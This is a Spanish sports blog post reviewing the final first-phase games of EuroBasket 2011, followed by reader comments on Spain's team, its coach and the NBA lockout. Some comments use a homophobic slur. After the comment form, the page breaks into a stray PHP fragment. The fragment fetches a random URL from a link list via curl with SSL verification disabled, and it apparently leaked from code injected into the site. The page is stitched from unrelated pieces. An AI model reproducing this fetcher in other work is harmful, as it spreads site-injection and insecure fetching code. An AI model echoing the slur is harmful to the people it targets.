EuroNBAsket 2011: Fin de la 1ª fase

06 de September de 2011 por TheDeerHunter

Termina la primera fase. Ya teníamos ganas, para que nos vamos a engañar. La de ayer fue la típica jornada de fin de liguilla, cargada de emociones y a vida o muerte para algunos. Lo que separa a los niños de los hombres…

GRUPO A

Gran Bretaña 88 – Polonia 81: Tan cerca y tan lejos. No se jugaban nada más que la honra los británicos, pero a Polonia le pudo entrar el vértigo tras la machada del día anterior. Miedo o incapacidad, porque sus rivales les pegaron un repaso bajo tableros que no tiene nombre y en ningún momento pudieron soñar con parar a Deng y, sobre todo a Freeland. Otra vez será. Por su parte Luol Deng es el máximo favorito al premio “mayor esfuerzo en vano” como mínimo de esta primera fase o incluso de la competición. Se le echará de menos.

Destacado NBA: Luol Deng 28 ptos, 14 reb, 6 asis, 2 rob
Destacado resto: Joel Freeland 27 ptos (12/12 TC), 11 reb, 1 asis

España 57 – Turquía 65: Jarro de agua fría para los vigentes campeones. Un día después de una de las mayores exhibiciones de su historia tocaba uno de los peores apagones en el último cuarto. Parcial de 2-16 que debería hacer sonrojar a más de uno. Asusta plantearse cuales serían los objetivos de este equipo sin Pau Gasol, ayer en el dique seco por lógico criterio conservador. Por otro lado hubiera resultado bastante injusto que un equipo del potencial de Turquía se quedara fuera a estas alturas. ¡Qué buena pinta tiene Emir Predzilc y qué daño hizo Asik en la segunda parte! La derrota de Polonia hace que España pase a la siguiente fase virtualmente empatada con Lituania y Turquía.

Destacado: Emir Predzilc 18 ptos, 5 reb, 1 rob (18 min)

Portugal 69 – Lituania 98: Los lusos pagaron los platos rotos de la humillación del día anterior. Partido de trámite sobre el que no perderemos mucho el tiempo. La cenicienta del grupo se vuelve a casa con 69 puntos anotados y 86 encajados por partido.

Destacado: Sarunas Jasikevicius 14 ptos, 3 asis (12 min)

GRUPO B

Israel 96 – Italia 95: Un punto de diferencia, pero un abismo en cuanto a sensaciones. Israel se despide del campeonato con un buen sabor de boca, con una trayectoria bastante digna y ofreciendo buenas muestras de baloncesto. Italia, con sus ilustres NBA, se marcha con el rabo entre las piernas, sin haber llegado a ofrecer resistencia real a su eliminación e insinuando que su modelo no va a ningún lado. 81 puntos encajados por partido es algo ridículo… y hasta los israelís han anotado más que ellos. Esta derrota es únicamente la puntilla.

Destacados NBA: Andrea Bargnani 26 ptos, 11 reb, 3 asis; Danilo Gallinari 19 ptos, 5 reb, 1 asis, 1 tap
Destacado resto: Lior Eliyahu 16 ptos, 7 reb, 3 asis, 1 tap, 1 rob

Letonia 80 – Alemania 81: Partido intrascendente y de preparación/descanso para los germanos. Sólo el poco acierto de los letones en los tiros libres les salvó de una nueva derrota que, en esta ocasión, no hubiera contado.

Destacado: Rihard Kuksiks 27 ptos, 6 reb, 1 asis, 3 rob

Serbia 96 – Francia 97: Fantástico choque de trenes. Ambas selecciones dándolo todo sin especular, con el colchón de la clasificación asegurada. Los bleus hicieron valer su superioridad física, aunque volvieron a encontrarse con sus defectos más típicos, el tiro exterior y la distribución, precisamente los factores que le hubieran dado la victoria a Serbia si Savanovic no hubiera fallado un lanzamiento fácil en el último instante. La victoria, más allá de lo circunstancial de este resultado, le otorga mucho crédito a Francia, imbatidos para la segunda fase, y genera dudas en la tradicional buena defensa serbia, que no ha funcionado hasta la fecha.

Destacados NBA: Tony Parker 24 ptos, 2 reb, 2 asis, 6 rob; Joaquim Noah 14 ptos, 9 reb, 3 asis, 1 rob; Nicolas Batum 18 ptos, 5 reb, 2 asis, 4 rob, 2 tap; Boris Diaw 15 ptos, 5 reb, 5 asis
Destacados resto: Marko Keselj 25 ptos (7/9 3p) 2 reb, 1 rob; Nenad Krstic 22 ptos, 2 reb, 4 asis, 1 tap

GRUPO C

Finlandia 71 – Montenegro 65: Se confirma la machada de Finlandia, como ya avanzaba algún compañero. En esta ocasión victoria basada bajo los aros ante unos montenegrinos mentalmente en otra parte. Cómo comenzó Dasic y cómo ha terminado. Menudo exterminio de paises balcánicos ha tenido lugar en este grupo y horrible imagen la de Montenegro.

Destacado NBA: Nicola Pekovic 16 ptos, 6 reb, 3 asis, 3 rob
Destacado resto: Tuuka Kotti 11 ptos, 8 reb, 2 asis, 3 rob

Grecia 74 – Croacia 69: Querer y no poder de la bisoña croacia. El oficio puro y duro de los griegos les da para, casi sin quererlo, confirmar otra ilustre eliminación.

Destacado: Konstantinos Vasileiadis 17 ptos, 5 reb, 1 asis

Macedonia 75 – Bosnia-Herzegovina 63: Los sólidos macedonios también le dieron la puntilla a la errática selección vecina. Un ejemplo de selección descabezada. Su condena definitiva fueron las 18 pérdidas por únicamente 4 de sus rivales.Teletovic, tremendamente irregular marcando el paso de su selección, apunta al premio de “decepción”, como mínimo de esta primera fase.

Destacados: Bo McCalebb 22 ptos, 2 reb, 4 asis; Pero Antic 15 ptos, 14 reb, 2 asis, 1 tap;
Nihad Dedovic 15 ptos, 7 reb

GRUPO D

Georgia 69 – Bulgaria 79: Derrota intrascendente para Georgia y estupenda despedida para los búlgaros, terminando nada menos que cuartos. Excelente actuación de Earl Rowland y Viktor Sanikidze. Buen final de los Ivanov.

Destacados: Earl Rowland 25 ptos, 2 reb, 4 asis, 2 rob
Viktor Sanikidze 18 ptos, 9 reb, 3 asis, 1 rob, 2 tap

Eslovenia 64 – Rusia 65: El basket es así. Monya lo había fallado todo hasta enganchar la canasta decisiva a 2 décimas para el final. Antes se había visto mucha táctica e igualdad. Al César lo que es del César y Maljkovic le ha insuflado su carácter serio a la selección que dirige. Rusia conserva así, de milagro, su imbatibilidad.

Destacados: Andrey Vorontsevich 18 ptos, 5 reb, 1 asis
Erazem Lorbek 14 ptos, 5 reb, 5 asis, 1 rob

Ukrania 74 – Belgica 61: Intrascendente. Ambos eliminados. La defensa belga hace bueno el ataque de Ukrania, y eso que la diferencia bajo tableros no fue la esperada. Bélgica es lo que es, no decepciona. Sí lo ha hecho un poco Ukrania.

Destacado: Viacheslav Kravtsov 13 ptos, 16 reb, 1 asis, 1 tap

Comenta

9 comentarios a esta entrada

  1. Txusma dice:
    #1

    Aún a sabiendas que lo de ayer es un accidente me vienen 2 preguntas a la cabeza:
    – Seguiríamos siendo los máximos favoritos si Pau Gasol no jugara?
    – Vosotros no estarías preocupados con la actuación de Ricky Rubio si fuerais el GM de los Wolves?

      Citar

  2. -=TheKing=- dice:
    #2

    Me da que a la primera dificultad España va a caer, pierden ventajas a la velocidad de la luz.

      Citar

  3. Sancho88 dice:
    #3

    Ricky me recuerda al colega de la película que era un crack con unas zapas viejas que eran mágicas, luego se las quitaba y era un paquete. para mí que esas zapas las heredó ricky y se las han debido robar o algo.

    Una pandilla de altura, se llamaba la película. Eso fuimos nosotros ayer.

    Y sí, a la pregunta de Txusma, sin Pau seríamos Grecia o algo parecido. En segunda ronda sin mucho lustre y con todas las papeletas para irnos a casita en cuartos o incluso antes. Esta claro que la exhibición contra Lituania viene de las preocupaciones de los lituanos al defender a los Gasoles. Así, el resto se quedaban bastante solos para tirar y por eso les dimos el tute. Aunque Pau no anotó demasiado, ya hizo ese trabajo de jugador al que tenían que marcar. Eso ayer no pasaba. Realmente defectuosa la defensa española sobre Preldzic, con Carlos Suárez, un tío de más de dos metros y con físico de alero (Claver tiene físico de Manute Bol y es un chulo chulito que se lo tiene muy creído) creo que esto cambiaría. Y precisamente no fue Rudy el que tuvo la culpa, yo diría que fue el que mejor defendió de España. Pero no sé, vale que Claver sea un paquete, pero lo de Llull de alero eso sí que no me lo esperaba. Fue lamentable y muy triste. Las ideas baloncestísticas de Scariolo son extrañas, yo creo que no es coherente y no sabe leer los partidos, vive pendiente de lo que le dicta el Marca. Es que, cuando jugaban Hedo y Predlzic, por muchos experimentos que quieras hacer, no tienes dos tíos que midan más de dos metros para esa posición. Y al que tienes tampoco le sacas…

    Está claro que Pau va a tener que ponerse el traje de superheroe de nuevo, que Ibaka es clave clave clave en esta selección, porque va a tener muchísimo curro a partir de mañana, que los interiores es lo único potable que tenemos, y que sin bases que hagan algo no llegamos a nada. Viendo ayer a Francia y Serbia yo pensaba, joder, con este nivel de juego a España le ganarían de 20.

    Muy mal España, muy mal

      Citar

  4. TheDeerHunter dice:
    #4

    Osti, cómo viene Sancho…

    Yo creo que Ricky tiene un problema, desde luego, y que de lo que yo me preocuparía si fuera el GM de los Wolves es de tenerle contratado un buen preparador específico para reventarlo a tirar en cuanto baje del avión. Opino que Ricky nunca será un tirador, pero que es una de las facetas que se pueden corregir en muy buena medida a base de curro. Eso sí, eso no se resuelve en dos días y ahora mismo es un problema de coco y de confianza. Lamentablemente el eurobasket no es el mejor escenario para curar esos rollos.

    Claver es un grandísimo jugador, lo sabe quien lo sigue habitualmente en Valencia. Yo no creo que su problema sea precisamente chulería, más bien al contrario, y conozco gente bastante cercana a él. La historia es que para un chaval de su edad codearse con un Gasol, o un Ibaka no debe de ser fácil. Contar con 3 o 4 minutos para demostrar cosas cuando él está habituado a otro rol tampoco lo debe de ser. Finalmente el mareo en el baile de posiciones no le va a ayudar. En cualquier caso está siendo un desastre, pero si estuviera fino estaríamos en las mismas y está por detrás de Rudy que creo que no deberíamos tener queja.

    Yo creo que el problema de ayer es haber jugado dos partidos como esos en menos de 24 horas. Pasa en las mejores familias y lo podemos ver siempre en los back to back de la nba. Habría que hacer un estudio de la bajada del ratio en los segundos partidos, en general para todos los equipos. Estamos hablando que han jugado 5 partidos en 6 días. Es un apagón físico de libro. Añade que te falta Gasol, que Ibaka está muy verde en la selección y la tienes montada.

    Además, que los turcos no se chupan el dedo, es un equipo evidentemente muy potente (sobre todo en el plano físico), lo hicieron bien y se beneficiaron del pajarón de España. Querría ver la defensa de Onán a un Navarro con las piernas más frescas. Ayer el pobre no se pudo ir en ninguna ocasión.

    Opino que hay Gasol-dependencia. Creo que es evidente y normal. Que mientras él no se retire del todo hay jugadores que no van a asumir determinado rol. Sobre el papel creo que sin Gasol deberían seguir siendo favoritos aunque muy posiblemente no máximos. La realidad es que sería complicado pasar de cuartos o en el mejor de los casos semis.

    En definitiva… a mí la derrota contra Turquía no me quita para nada el sueño. Creo que esta selección se parece más a lo de Lituania que a lo de ayer…aunque aquello tampoco fue real.

      Citar

  5. HisRoyalAirness dice:
    #5

    Hola gente! Feliz vuelta al curro!

    A ver, yo el problema de la selección lo veo personalizado en una figura: Scariolo. Es un tipo especialista en desmoralizar jugadores y en romper rachas con sus rotaciones absurdas cuadriculadas. Si pretendes que 2 chavales jóvenes, como son Claver y Ricky, rindan a un nivel aceptable necesitas darles algo de continuidad en pista y no meter a TODO el equipo suplente de golpe cuando salen ellos.

    A Ricky se le ve totalmente cohibido, le dan el balón y acelera, mira al banco y se frena; el rollo FIBA de los ataques en estático me parece un bodrio y a jugadores ágiles y creativos como él les corta; y el chico tiene una ventaja, sabe llevar la responsabilidad bajo presión. Pero no la dejan (y es lógico, ojo).
    Lo del tiro? Está claro que lo van a poner a tirar en Minnesotta hasta que le sangren los codos y eso es muy mejorable. Las habilidades se adquieren, el talento no.

    A Claver no le han dado confianza como 3 y ahora no hay manera; está jugando con la certeza de que si falla una se va al banco.

      Citar

  6. Nacho dice:
    #6

    Creo que no aporto nada nuevo, salvo que creo que esta selección sería de las favoritas sin Gasol, siempre y cuando en el banquillo esté otro tipo. Ya lo dije el otro día, a Scariolo (tipo que me gustaba) le viene grande esta selección. Como dice Sancho, ni sabe leer los partidos, ni es coherente con sus postulados. Lo primero es grave, lo segundo de juzgado de guardia. Si uno planifica una selección tiene que ser fiel a lo que planifica. Salvo que te fallen los elementos. Si conformo doce tíos y prefiero a Claver que a Suárez por sus posibilidades de jugar de 4, y me llega el partido en el que me falla el puntal de mi juego interior, y al chaval no le doy bola, estoy pegándome un tiro en el pie. Y ese es Scariolo, que también se columpió en sentido parecido en el mundial.
    Por otro lado, lo de Pau ayer, y lo más grave de Velikovic y del lituano, debería hacer reflexionar a la FIFA sobre su marcha atrás sobre la idea de seleccionar a 14, y acreditar a 12 por partido. Además no olvidemos que se juegan demasiados partidos en poco tiempo.
    Bueno, saludos a todos, y se agradecería, si podéis, nuevas sobre el lockout.

      Citar

  7. Txusma dice:
    #7

    Buenas Nacho,
    sobre el tema del lockout la semana que viene publicaremos un buen artículo explicando la situación actual. Algunos jugadores (Lebron, Rose, Bosh…) dicen que son optimistas y que habrá liga pero la realidad es q muchos ya han firmado con equipos de fuera (Mozgov, Blair, Maggette, Chandler…) y que las cosas parecen no avanzar.

      Citar

  8. Sancho88 dice:
    #8

    Una pregunta Txusma. Puede ser que las declaraciones que están haciendo Rose, Lebron y demás, puntales de las grandes marcas deportivas, tengan algo que ver precisamente con algún tipo de presión que estén haciendo estas marcas a la liga para que no haya cierre patronal? sabeis algo sobre esto? Pero esta claro que fue el mismo día, uno en Madrid y el otro en Barcelona, y soltaron palabras muy parecidas. Supongo que a todos los sitios adonde vayan irán diciendo lo mismo, pero la realidad es que los jugadores están firmando ya fuera. No sé, yo creo que en este caso los representantes de los propios jugadores deberían ser parte activa de la negociación, o por lo menos, ponerse de acuerdo con el sindicato de jugadores para que por una parte no se diga que no hay liga, que no se bajan los sueldos, y por la otra algunos jugadores sí que afirmen esto mismo. Por ejemplo, en la liga española en la foto del sindicato salían todos los jugadores, en representación de todos los equipos. Yo no estoy viendo esta presión en el caso del sindicato de Billy Hunter y Fisher. Más bien veo que cada uno va a su bola, unos firman en China, otros en Rusia y tal, pero no hay una verdadera foto de familia como la hubo en la AFE para anunciar que iban todos a una. Y hombre, ya sé que son casos diferentes y que en la NBA lo más sagrado son los contratos de los jugadores y que se pagan a tocateja, y que la huelga de la AFE fue porque no les pagaban y el lockout es porque la liga es insostenible y los propietarios dicen que palman más de 200 millones al año, pero no sé, no veo un golpe sobre la mesa serio, parece que no ha pasado nada. Luego todo el rollo de la liga alternativa de Las Vegas… sí, como dice Nacho, queremos nuevas sobre el lockout, jeje.

    Y con respecto a Claver, a ver, yo no le conozco. He vivido el último año en Valencia y siempre escuchas a gente de las canteras y tal, más o menos de su edad, que por cierto ya no es un juvenil de 20 años para no poder con la presión de jugar en la selección, y si no puede con ella, que se lo haga mirar. Siempre les escuchas que es muy buen chaval, eso es cierto. Yo a lo que me refiero llamándole chulo es como que simplemente por estar ahí parece que se lo tiene creído. No sé, debería dejarse los huevos cuando sale a pista, es a lo que me refiero, me he expresado mal ya que no quería decir nada de como es el chico fuera de la pista. La actitud en la cancha. No puedes salir y tirarte triples sin venir a cuento que no tocan ni aro, o no saberte los sistemas y perder todo el rato el balón, cosa que le pasa también a Serge. En mi humilde opinión, si te han dado la oportunidad por delante de un excelente jugador como es Carlos Suárez, por lo menos no le quites la razón. No sé, lo único que veo yo de Claver es que lleva yendo tres años seguidos a la selección y todavía no le he visto jugar bien ninguna vez. Eso quiere decir algo, creo.

    También le influye la lesión que ha tenido toda la temporada, que ha sido extrañísima para él. Antes de la lesión se estaba saliendo, luego muchos meses parado, acabo la temporada jugando a muy muy buen nivel buscando seguramente la convocatoria de Scariolo, que le fue a ver alguna vez a Valencia, en un clinic que ofreció, precisamente, y a ver, Darryl Middleton se esforzaba más en el entrenamiento que él. Y por supuesto, Rafa Martínez se esforzaba mucho más en el entrenamiento que él. Habría que preguntarle a Chechu Mulero, que es el que parte y reparte en ese club. Yo no sé que le pasa, pero algo extraño debe ser.

    Y he de reconocer que el comentario sobre Ricky es sarcástico. Todos sabemos lo que lleva guardado dentro, pero la verdad que se está, con todos mis respetos, amariconando. En Pekín le echaba más pelotas y se jugaba el pellejo en cada jugada, ahora es un timorato y asustadizo muñeco. Pero claro, allí tenía a Aíto. Ahora tiene al pizarrista Scariolo. Puede que ahí esté la diferencia

      Citar

  9. HisRoyalAirness dice:
    #9

    Yo creo que esa es la diferencia Sancho; es cierto, yo lo veo jugar amariconado pero eso es cosa del sistema, si es por él seguro que le echaba más melindres

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>